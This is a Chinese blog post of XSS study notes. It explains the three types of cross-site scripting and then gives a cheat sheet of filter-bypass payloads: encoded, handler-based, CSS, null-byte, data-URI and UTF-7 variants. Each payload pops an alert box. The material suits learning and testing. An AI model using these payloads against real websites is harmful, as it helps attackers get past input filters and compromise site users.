<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="web安全," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="Cross-Site Scripting（XSS）是一类出现在 web 应用程序上的安全弱点，攻击者可以通过 XSS 插入一 些代码，使得访问页面的其他用户都可以看到，XSS 通常是可以被看作漏洞的。它允许攻击者绕过安全机 制，通过尝试各种不同的方法插入恶意代码，攻击者可以得到敏感页面的权限，会话，cookies，或者其 他的东西，XSS 分为三类0x01 XSS分类：非持久性，持久性和基于 Do">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS学习笔记">
<meta property="og:url" content="http://lovexiaofeng.cn/2016/07/27/23/index.html">
<meta property="og:site_name" content="小峰's Blog">
<meta property="og:description" content="Cross-Site Scripting（XSS）是一类出现在 web 应用程序上的安全弱点，攻击者可以通过 XSS 插入一 些代码，使得访问页面的其他用户都可以看到，XSS 通常是可以被看作漏洞的。它允许攻击者绕过安全机 制，通过尝试各种不同的方法插入恶意代码，攻击者可以得到敏感页面的权限，会话，cookies，或者其 他的东西，XSS 分为三类0x01 XSS分类：非持久性，持久性和基于 Do">
<meta property="og:updated_time" content="2016-07-29T12:01:50.025Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS学习笔记">
<meta name="twitter:description" content="Cross-Site Scripting（XSS）是一类出现在 web 应用程序上的安全弱点，攻击者可以通过 XSS 插入一 些代码，使得访问页面的其他用户都可以看到，XSS 通常是可以被看作漏洞的。它允许攻击者绕过安全机 制，通过尝试各种不同的方法插入恶意代码，攻击者可以得到敏感页面的权限，会话，cookies，或者其 他的东西，XSS 分为三类0x01 XSS分类：非持久性，持久性和基于 Do">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"always"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://lovexiaofeng.cn/2016/07/27/23/"/>

  <title> XSS学习笔记 | 小峰's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">小峰's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">一个不抽烟 不喝酒的少年</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                XSS学习笔记
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-07-27T11:16:31+08:00" content="2016-07-27">
              2016-07-27
            </time>
          </span>

          

          
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="Cross-Site-Scripting（XSS）是一类出现在-web-应用程序上的安全弱点，攻击者可以通过-XSS-插入一-些代码，使得访问页面的其他用户都可以看到，XSS-通常是可以被看作漏洞的。它允许攻击者绕过安全机-制，通过尝试各种不同的方法插入恶意代码，攻击者可以得到敏感页面的权限，会话，cookies，或者其-他的东西，XSS-分为三类"><a href="#Cross-Site-Scripting（XSS）是一类出现在-web-应用程序上的安全弱点，攻击者可以通过-XSS-插入一-些代码，使得访问页面的其他用户都可以看到，XSS-通常是可以被看作漏洞的。它允许攻击者绕过安全机-制，通过尝试各种不同的方法插入恶意代码，攻击者可以得到敏感页面的权限，会话，cookies，或者其-他的东西，XSS-分为三类" class="headerlink" title="Cross-Site Scripting（XSS）是一类出现在 web 应用程序上的安全弱点，攻击者可以通过 XSS 插入一 些代码，使得访问页面的其他用户都可以看到，XSS 通常是可以被看作漏洞的。它允许攻击者绕过安全机 制，通过尝试各种不同的方法插入恶意代码，攻击者可以得到敏感页面的权限，会话，cookies，或者其 他的东西，XSS 分为三类"></a>Cross-Site Scripting（XSS）是一类出现在 web 应用程序上的安全弱点，攻击者可以通过 XSS 插入一 些代码，使得访问页面的其他用户都可以看到，XSS 通常是可以被看作漏洞的。它允许攻击者绕过安全机 制，通过尝试各种不同的方法插入恶意代码，攻击者可以得到敏感页面的权限，会话，cookies，或者其 他的东西，XSS 分为三类</h3><h2 id="0x01-XSS分类："><a href="#0x01-XSS分类：" class="headerlink" title="0x01 XSS分类："></a>0x01 XSS分类：</h2><h3 id="非持久性，持久性和基于-Dom（此类可以是持久的，也可以是不持久的）"><a href="#非持久性，持久性和基于-Dom（此类可以是持久的，也可以是不持久的）" class="headerlink" title="非持久性，持久性和基于 Dom（此类可以是持久的，也可以是不持久的）"></a>非持久性，持久性和基于 Dom（此类可以是持久的，也可以是不持久的）</h3><p>1)非持久性:非持久性 XSS 也被称为反射性 XSS，是目前最普遍的类型，当攻击者提供了一些代码的时候， 服务器端马上就会返回页面的执行结果。举个例子，就比如某个网页上的搜索引擎，如果攻击者搜索的字 符串包含了一些 html 标签，通常来说，搜索的结果就会以该形式显示出来，或者，至少，搜索的字符串 会包含在页面里。而这个我们是可以修改的，如果任何搜索的字符串都没有被 html 编码，XSS 漏洞就产 生了。</p>
<p>2)持久性 XSS:也叫做存储型 XSS，或是二次漏洞，他能够导致更加有效的攻击。当攻击者提交到 web 应用 程序里的数据会永久性的存储到服务器的时候会产生这类漏洞，(比如数据库，文件系统，其他位置)，之 后，如果没有经过 HTML 编码，那么每一个访问该页面的用户都会被攻击，典型的例子就是在线留言板， 它允许用户提交数据。</p>
<p>3)基于 DOM 的 XSS:也叫做本地跨站，基于 html/xml 上叫做文档对象模型(DOM)的标准对象模型，这类 漏洞，问题出现在页面的客户端脚本上，比如，如果一个 javascript 脚本处理 url 请求参数，然后使用这 个参数值来显示给用户页面，没有经过任何编码，那么 XSS 漏洞产生，和非持久的类似，攻击者可以用恶 意代码填充这个参数，然后覆写的页面诱骗用户点击，然后就会被浏览器解析成 html，包含了恶意的脚本 代码。</p>
<h2 id="0x02-发现-XSS-漏洞"><a href="#0x02-发现-XSS-漏洞" class="headerlink" title="0x02 发现 XSS 漏洞"></a>0x02 发现 XSS 漏洞</h2><p>最常用的 XSS 漏洞测试代码:</p>
<pre><code>&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
</code></pre><p>当这个代码被注入到输入框或是 url 参数的时候，会成功也可能会失败，如果失败了。也不意味着网站就 是安全的。需要继续渗透。</p>
<h2 id="0x03-XSS-绕过过滤"><a href="#0x03-XSS-绕过过滤" class="headerlink" title="0x03 XSS 绕过过滤"></a>0x03 XSS 绕过过滤</h2><h4 id="转义字符串"><a href="#转义字符串" class="headerlink" title="转义字符串"></a>转义字符串</h4><p>第一步是查看当前的页面源代码，看看是不是包含了我们的这个测试的字符串，如果你发现了,你就会发现很有意思,要细心。是在一个输入(input)标签里。</p>
<pre><code>&lt;INPUT type=&quot;text&quot; value=&apos;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;&gt;
</code></pre><p>在这个例子，我们可以修改我们的输入来包含两个字符，来让代码跳出那对外围的单引号</p>
<pre><code>&apos;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;
</code></pre><a id="more"></a>
<p>现在我们的代码执行了。因为我们闭合了前面的 html 标签，就触发了 XSS，但是，你可能会发现，页面 上会显示一个多出来的单引号，为什么，因为后面的那个原来的单引号没有匹配，我们继续修改我们的代 码。</p>
<pre><code>&apos;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&lt;xss a=&apos;
</code></pre><p>所有的输入就会变成这样:</p>
<pre><code>&lt;INPUT type=&quot;text&quot; value=&apos;&apos;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&lt;xss a=&apos;&apos;&gt;
</code></pre><p>Ok Javascript 代码就注入了。<xss a="”">这个没什么意义，你可以自己改，但是符合 html 的标准，页面不会出错。</xss></p>
<h4 id="绕过单引号过滤"><a href="#绕过单引号过滤" class="headerlink" title="绕过单引号过滤"></a>绕过单引号过滤</h4><p>同样的例子，但是我们假设管理员在我们的单引号之前放置了一个“\”，有时候双引号之前也会放置，通 过一些类似 add_slashes 的函数可以实现，这个就是转义字符，我们先前的代码就会变成这样：</p>
<pre><code>&lt;INPUT type=&quot;text&quot; value=&apos;\&apos;&gt;&lt;SCRIPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCRIPT&gt;&apos;&gt;
</code></pre><p>有一些方法可以继续，但是要看过滤的那个函数是怎么放的了。其中一个方法就是使用字符实体，学过 html 的都知道，就是一些特殊字符会用一些固有的符号组合来表示，举个例子，你不能用&lt;&gt;表示大于和小于， 因为这被解释为 html 标签，但是，你如果要用，可以用下面的来代替</p>
<pre><code>&amp;#34;   &amp;quot;  &quot;   双引号
&amp;#38;   &amp;amp;   &amp;   &amp;符号
&amp;#60;   &amp;lt;    &lt;   小于号
&amp;#62;   &amp;gt;    &gt;   大于号
</code></pre><p>使用&quot;或者&#34; 来代替我们的双引号，有时候可以绕过过滤.</p>
<pre><code>&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
&lt;script&gt;alert(&amp;quot;XSS&amp;quot;)&lt;/script&gt;
&lt;script&gt;alert(&amp;#38;XSS&amp;#38;)&lt;/script&gt;
</code></pre><p>如果这都被过滤了。那我们可以使用 JavaScript 的 fromCharCode 函数，这个函数把指定的 Unicode<br>值转换成字符串.</p>
<pre><code>&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
&lt;script&gt;alert(String.fromCharCode(88,83,83))&lt;/script&gt;
&lt;INPUT type=&quot;text&quot; value=&apos;\&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&apos;&gt;
</code></pre><p>你可以使用 Mysql 数据库的 char（字符，字符）来转换字符到字符码，大家可以使用自己喜欢的就行了。 转码的工具还是很多的。</p>
<h4 id="绕过标签过滤"><a href="#绕过标签过滤" class="headerlink" title="绕过标签过滤"></a>绕过标签过滤</h4><p>有些过滤器会过滤到标签标签，那上面的例子就都废了，但是。还是有方法插入javascript的。我 们看看事件处理器的例子。</p>
<pre><code>&lt;BODY onload=&quot;alert(&apos;XSS&apos;)&quot;&gt;
</code></pre><p>在html里啊。这个Onload关键字就是一个事件，其他的所有标签都没有这个属性，但是 Body 标签是有的。但是，有一定的局限性，如果onload事件在你的代码之前已经被处理了。那就不会触发了。不过我们可以继续看看 onerror 事件处理。</p>
<pre><code>&lt;IMG SRC=&quot;&quot; onerror=&quot;alert(&apos;XSS&apos;)&quot;&gt;
</code></pre><p>注意看，图片没有指定，也就是出错了。Onerror这个事件就会发茶。引发XSS漏洞，没有用标签 标签哦。</p>
<h4 id="使用-IMG-源"><a href="#使用-IMG-源" class="headerlink" title="使用 IMG 源"></a>使用 IMG 源</h4><p>Html 中最常用的两个标签 img 和 a href 一般是不会过滤的，一个指定图片，一个指定超链接。最危险的 事 img 标签。<br>下面是一些例子: 标准的样子：</p>
<pre><code>IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;
</code></pre><p>没有双引号和分号:</p>
<pre><code>&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;
</code></pre><p>过滤了双引号和标签:</p>
<pre><code>&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
</code></pre><p>使用 CharCode 绕过过滤:</p>
<pre><code>&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
</code></pre><p>有经验的攻击者也可以把上面的全部转换成相等的 Ascii 码:</p>
<pre><code>&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101; &amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
</code></pre><p>使用 Ascii 表你可以自己试试。当然转换成 16 进制也是可以的。。</p>
<pre><code>&lt;IMG 
SRC=&amp;#x6A;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3A;&amp;#x61;&amp;#x6C;&amp; #x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x27;&amp;#x58;&amp;#x53;&amp;#x53;&amp;#x27;&amp;#x29;&gt;
</code></pre><h4 id="使用制表符-换行符和回车符"><a href="#使用制表符-换行符和回车符" class="headerlink" title="使用制表符,  换行符和回车符"></a>使用制表符,  换行符和回车符</h4><p>这些符号都是可以用来欺骗过滤器的。</p>
<pre><code>&lt;IMG SRC=&quot;jav&amp;#x9ascript:alert(&apos;XSS&apos;);&quot;&gt;
</code></pre><p>上面的例子使用了最小的十六进制的制表符来欺骗过滤器。最后的输出结果不变</p>
<pre><code>&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;    

      Type            Horizontal Tab   New line    Carriage Return
       URL                   %09          %10           %13
Minimal Sized Hex            &amp;#x9         &amp;#xA          &amp;#xD
Maximum Sized Hex         &amp;#x0000009   &amp;#x000000A     &amp;#x000000D
Minimum Sized Decimal        &amp;#9          &amp;#10          &amp;#13
Maximum Sized Decimal     &amp;#x0000009   &amp;#x0000009     &amp;#0000009
</code></pre><h4 id="使用空字符"><a href="#使用空字符" class="headerlink" title="使用空字符"></a>使用空字符</h4><p>另一个可以绕过的就是空字符，这是最有效的工具了。。 下面这个就是个例子。:</p>
<pre><code>&lt;SCR%00IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;
</code></pre><p>空字符 (%00) 使得过滤器不能看到完整的标签中的标签. 只在 IE 6.0, IE 7.0 可以。<br>双引号配对的 bug ,绕过这种过滤就是寻找闭合的标签，然后构造来突破 比如:</p>
<pre><code>&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;
</code></pre><p>通常我们认为，img 标签里。前两个引号被认为是一对，什么都不做，下一个引号和最后的匹配，但是事 实不是这样，所有的浏览器都在试图修正这一问题。</p>
<p>结果最终如下:</p>
<pre><code>&lt;img&gt;&lt;script&gt;alert(&apos;xss&apos;)&lt;/script&gt;&quot;&amp;gt;
</code></pre><h2 id="0x04-绕过-CSS-过滤器"><a href="#0x04-绕过-CSS-过滤器" class="headerlink" title="0x04 绕过 CSS 过滤器"></a>0x04 绕过 CSS 过滤器</h2><p>HTML 标签用来插入 javaScript 很有用，但是 CSS 也是可以的哦。有很多方式向 CSS 里插入 XSS，所 有更多的方法可以攻击，嘴尖的方法是吧 XSS 代码放到 LINK 方式引用的 CSS 的 href 属性里面去</p>
<pre><code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
</code></pre><p>IE7 已经不允许了。但是 opera 和 IE6 还是可以的，另一个方式是使用style标签，不是很常见，一般是论坛啊。允许用户设计自己的贴的源代码的时候。</p>
<pre><code>&lt;STYLE&gt; a { width: expression(alert(&apos;XSS&apos;)) } &lt;/STYLE&gt; 
</code></pre><p>还有一种方式</p>
<pre><code>&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
</code></pre><h4 id="不全面的过滤器"><a href="#不全面的过滤器" class="headerlink" title="不全面的过滤器"></a>不全面的过滤器</h4><p>我们看看当开发者已经把能想到的都过滤了或者什么的。就安全了吗？不。我们可以依然可以向数据指令<br>(我前段时间还看到了。现在忘了这个准确的翻译了)里插入代码。我们通过 base64 加密</p>
<pre><code>&lt;script&gt;alert(‘XSS’)&lt;/script&gt;.

&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 K&quot;&gt;
</code></pre><p>数据指令允许我们把完全的文档变成一个单一的字符串。在火狐等浏览器都可以用。尼玛没说具体的用法。</p>
<h4 id="使用双引号"><a href="#使用双引号" class="headerlink" title="使用双引号"></a>使用双引号</h4><p>如果你需要使用双引号和单引号。使用一些诡异的用法把。。</p>
<pre><code>&lt;IMG SRC=`javascript:alert(&quot;Look its, &apos;XSS&apos;&quot;)`&gt;
</code></pre><h4 id="转义字符"><a href="#转义字符" class="headerlink" title="转义字符"></a>转义字符</h4><p>转义字符有时候很有用，可以对付一些简单的过滤器</p>
<pre><code>&lt;IMG SRC=`javascript:alert(\&quot;XSS\&quot;)`&gt;
</code></pre><p>结果如下:</p>
<pre><code>&lt;IMG SRC=`javascript:alert(\\&quot;XSS\\&quot;)`&gt;
</code></pre><h4 id="编码"><a href="#编码" class="headerlink" title="编码"></a>编码</h4><p>使用 utf-7 编码可以绕过 比如</p>
<pre><code>&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
</code></pre><p>使用 UTF-7 编码后:</p>
<pre><code>+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
</code></pre><p>然后所有的加号需要被改成%2b，否则会被浏览器识别为连接符</p>
<pre><code>%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-
</code></pre><p>一个列表:</p>
<pre><code>字符   实体引用
空格     %20
 /       %2F
 &quot;       %22
 ?       %3F
 +       %2B
</code></pre><h2 id="0x05-Ok-就这样子啦！会不会，熟不熟，一个字就是干。"><a href="#0x05-Ok-就这样子啦！会不会，熟不熟，一个字就是干。" class="headerlink" title="0x05 Ok 就这样子啦！会不会，熟不熟，一个字就是干。"></a>0x05 Ok 就这样子啦！会不会，熟不熟，一个字就是干。</h2>
      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>如果喜欢我，就请我喝咖啡吧！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="https://github.com/xiaofengtongxue/xiaofengtongxue.github.io/blob/master/images/a.jpg?raw=true" alt="ih0cker WeChat Pay"/>
          <p>微信打赏</p>
        </div>
      
      
    </div>
  </div>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web安全/" rel="tag">#web安全</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/07/27/22/" rel="next" title="PHP读文件的常用方法">
                <i class="fa fa-chevron-left"></i> PHP读文件的常用方法
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/07/28/24/" rel="prev" title="Mysql注入思考">
                Mysql注入思考 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/img.jpg"
               alt="ih0cker" />
          <p class="site-author-name" itemprop="name">ih0cker</p>
          <p class="site-description motion-element" itemprop="description">沉默，可以让混乱的心，变得清澈。</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">30</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">9</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/xiaofengtongxue" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/your-user-name" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/p/1005053869837461/home?from=page_100505&mod=TAB&is_hot=1#place" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://www.zhihu.com/people/helay" target="_blank" title="知乎">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  知乎
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Cross-Site-Scripting（XSS）是一类出现在-web-应用程序上的安全弱点，攻击者可以通过-XSS-插入一-些代码，使得访问页面的其他用户都可以看到，XSS-通常是可以被看作漏洞的。它允许攻击者绕过安全机-制，通过尝试各种不同的方法插入恶意代码，攻击者可以得到敏感页面的权限，会话，cookies，或者其-他的东西，XSS-分为三类"><span class="nav-number">1.</span> <span class="nav-text">Cross-Site Scripting（XSS）是一类出现在 web 应用程序上的安全弱点，攻击者可以通过 XSS 插入一 些代码，使得访问页面的其他用户都可以看到，XSS 通常是可以被看作漏洞的。它允许攻击者绕过安全机 制，通过尝试各种不同的方法插入恶意代码，攻击者可以得到敏感页面的权限，会话，cookies，或者其 他的东西，XSS 分为三类</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-XSS分类："><span class="nav-number"></span> <span class="nav-text">0x01 XSS分类：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#非持久性，持久性和基于-Dom（此类可以是持久的，也可以是不持久的）"><span class="nav-number">1.</span> <span class="nav-text">非持久性，持久性和基于 Dom（此类可以是持久的，也可以是不持久的）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-发现-XSS-漏洞"><span class="nav-number"></span> <span class="nav-text">0x02 发现 XSS 漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-XSS-绕过过滤"><span class="nav-number"></span> <span class="nav-text">0x03 XSS 绕过过滤</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#转义字符串"><span class="nav-number">0.1.</span> <span class="nav-text">转义字符串</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#绕过单引号过滤"><span class="nav-number">0.2.</span> <span class="nav-text">绕过单引号过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#绕过标签过滤"><span class="nav-number">0.3.</span> <span class="nav-text">绕过标签过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用-IMG-源"><span class="nav-number">0.4.</span> <span class="nav-text">使用 IMG 源</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用制表符-换行符和回车符"><span class="nav-number">0.5.</span> <span class="nav-text">使用制表符,  换行符和回车符</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用空字符"><span class="nav-number">0.6.</span> <span class="nav-text">使用空字符</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-绕过-CSS-过滤器"><span class="nav-number"></span> <span class="nav-text">0x04 绕过 CSS 过滤器</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#不全面的过滤器"><span class="nav-number">0.1.</span> <span class="nav-text">不全面的过滤器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用双引号"><span class="nav-number">0.2.</span> <span class="nav-text">使用双引号</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#转义字符"><span class="nav-number">0.3.</span> <span class="nav-text">转义字符</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#编码"><span class="nav-number">0.4.</span> <span class="nav-text">编码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-Ok-就这样子啦！会不会，熟不熟，一个字就是干。"><span class="nav-number"></span> <span class="nav-text">0x05 Ok 就这样子啦！会不会，熟不熟，一个字就是干。</span></a></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2015 - 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ih0cker</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.0.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  



  




  
  

  

  

  

</body>
</html>
